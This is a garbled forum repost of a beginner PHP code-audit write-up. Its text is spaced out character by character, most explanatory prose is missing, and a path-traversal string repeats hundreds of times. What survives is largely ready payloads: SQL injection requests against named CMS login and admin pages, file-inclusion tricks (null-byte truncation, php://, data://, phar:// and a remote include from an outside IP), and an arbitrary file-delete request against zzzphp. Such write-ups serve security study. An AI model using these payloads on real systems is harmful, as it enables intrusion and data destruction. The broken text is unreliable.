[18592] 2021-07-05_代码审计记一次PHP入门代码审计

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-07-05_代码审计记一次PHP入门代码审计   |   P H P   1 1 c c a a b   H A C K   2 0 2 1 - 0 7 - 0 5 #   , 2 # W e b   , 2 # P H P   , 1 # 0 x 0 1   s q l # # # 1 . 1   / a d m i n / f i l e s / l o g i n . p h p   / a d m i n / f i l e s / l o g i n . p h p 使   p a y l o a d # # # 1 . 2   / f i l e s / s u b m i t . p h p   , u s e r = 1 1 '   a n d   ( u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) , 0 x 7 e ) , 1 ) ) - -   + & p a s s w o r d = 1 1 & l o g i n = y e s
s e a y s q l # # # 1 . 3   / f i l e s / c o n t e n t . p h p   c o n t e n t . p h p
# # # 1 . 4   / a d m i n / f i l e s / e d i t c o l u m n . p h p   p a y l o a d # 0 x 0 2     # # # 2 . 1   t i p s     r e q u i r e ( )   r e q u i r e _ o n c e ( )   i n c l u d e ( )   i n c l u d e _ o n c e ( )     h t t p : / / 1 2 7 . 0 . 0 . 1 / c m s / x h c m s / a d m i n / ? r = e d i t c o l u m n & t y p e = 1 & i d = 1 % 2 7 % 2 0 a n d % 2 0 ( u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t % 2 0 u s e r ( ) ) , 0 x 7 e ) , 1 ) ) % 2 0 - - +
  # # # 2 . 1 . 1 2 . 1 . 2 % 0 0 m a g i c _ q u o t e s _ g p c   =   O f f   p h p < 5 . 3 . 4 f i l e n a m e = . . / . . / . . / . . / . . / . . / . . / b o o t . i n i % 0 0   w i n d o w s 2 5 6 l i n u x   4 0 9 6 < ? p h p $ f i l e n a m e   =   $ _ G E T [ ' f i l e n a m e ' ] ; i n c l u d e ( $ f i l e n a m e ) ; ? > < ? p h p $ f i l e n a m e   =   $ _ G E T [ ' f i l e n a m e ' ] ; i n c l u d e ( $ f i l e n a m e . " . h t m l " ) ? > s h e l l . t x t . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / .
2 . 1 . 3 a l l o w _ u r l _ f o p e n   =   O n   a l l o w _ u r l _ i n c l u d e   =   O n i n c l u d e / r e q u i r e   2 . 1 . 4 h t t p s : / / w w w . c n b l o g s . c o m / e n d u s t / p / 1 1 8 0 4 7 6 7 . h t m l p h p : / / f i l t e r   p h p : / / i n p u t P a y l o a d ? f i l e n a m e = p h p : / / f i l t e r / c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = i n d e x . t x t   ? f i l e n a m e = p h p : / / i n p u t   p o s t   ' ) ; ? > < ? p h p   i n c l u d e ( $ _ G E T [ ' f i l e n a m e ' ]   .   " . h t m l " ) ;   ? > f i l e n a m e = h t t p : / / 1 2 7 . 0 . 0 . 1 / 1 / i n c l u d e . p h p ? f i l e n a m e = h t t p : / / 4 9 . 2 3 5 . 5 4 . 1 3 5 / w p - c o n t e n t / u p l o a d s / 2 0 2 0 / 0 4 / 2 - 7 - 1 8 0 x 1 0 0 . p n g ? f i l e n a m e = h t t p : / / 1 2 7 . 0 . 0 . 1 / 1 / i n c l u d e . p h p ? f i l e n a m e = h t t p : / / 4 9 . 2 3 5 . 5 4 . 1 3 5 / w p - c o n t e n t / u p l o a d s / 2 0 2 0 / 0 4 / 2 - 7 - 1 8 0 x 1 0 0 . p n g % 2 3 f i l e n a m e = h t t p : / / 1 2 7 . 0 . 0 . 1 / 1 / i n c l u d e . p h p ? f i l e n a m e = h t t p : / / 4 9 . 2 3 5 . 5 4 . 1 3 5 / w p - c o n t e n t / u p l o a d s / 2 0 2 0 / 0 4 / 2 - 7 - 1 8 0 x 1 0 0 . p n g % 2 0
f i l e : / /   d a t a : / /   p c h a r : / /   z i p : / / p c h a r i n d e x . t x t   ? f i l e n a m e = f i l e : / / / D : / p h p s t u d y / P H P T u t o r i a l / W W W / i n d e x . t x t   ? f i l e n a m e = d a t a : / / t e x t / p l a i n ,   ? f i l e n a m e = p h a r : / / i n d e x . z i p / i n d e x . t x t # # # 2 . 2   i n d e x . p h p   z z z c m s i n d e x . p h p
# 0 x 0 3     z z z p h p 便
s a v e . p h p   a c t d e l f i l e , d e l f i l e ( ) p a t h s a f e _ p a t h d e l _ f i l e ( ) i f s t r i n f u n c t i o n   d e l f i l e ( ) {         $ f i l e = g e t f o r m ( ' p a t h ' , ' p o s t ' ) ;                       $ f i l e _ p a t h = f i l e _ p a t h ( $ f i l e ) ;         $ s a f e _ p a t h = a r r a y ( ' u p l o a d ' , ' t e m p l a t e ' , ' r u n t i m e ' , ' b a c k u p ' ) ;         i f ( a r r _ s e a r c h ( $ f i l e _ p a t h , $ s a f e _ p a t h ) ) {                 $ f i l e = $ _ S E R V E R [ ' D O C U M E N T _ R O O T ' ] . $ f i l e ;                   r e t u r n   d e l _ f i l e ( $ f i l e ) ;         } }
p a y l o a d   P O S T   / c m s / z z z p h p V 1 . 6 . 1 / a d m i n 1 7 8 / s a v e . p h p ? a c t = d e l f i l e   p a t h = / c m s / z z z p h p V 1 . 6 . 1 / t e m p l a t e / . . / i n s t a l l / 1 . t x t # 0 x 0 4     s a v e . p h p a c t u p l o a d   s a v e . p h p ? a c t = u p l o a d & u p t y p e = i m a g e & u p f o l d e r = n e w s u p _ l o a d ( )
u p l o a d
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则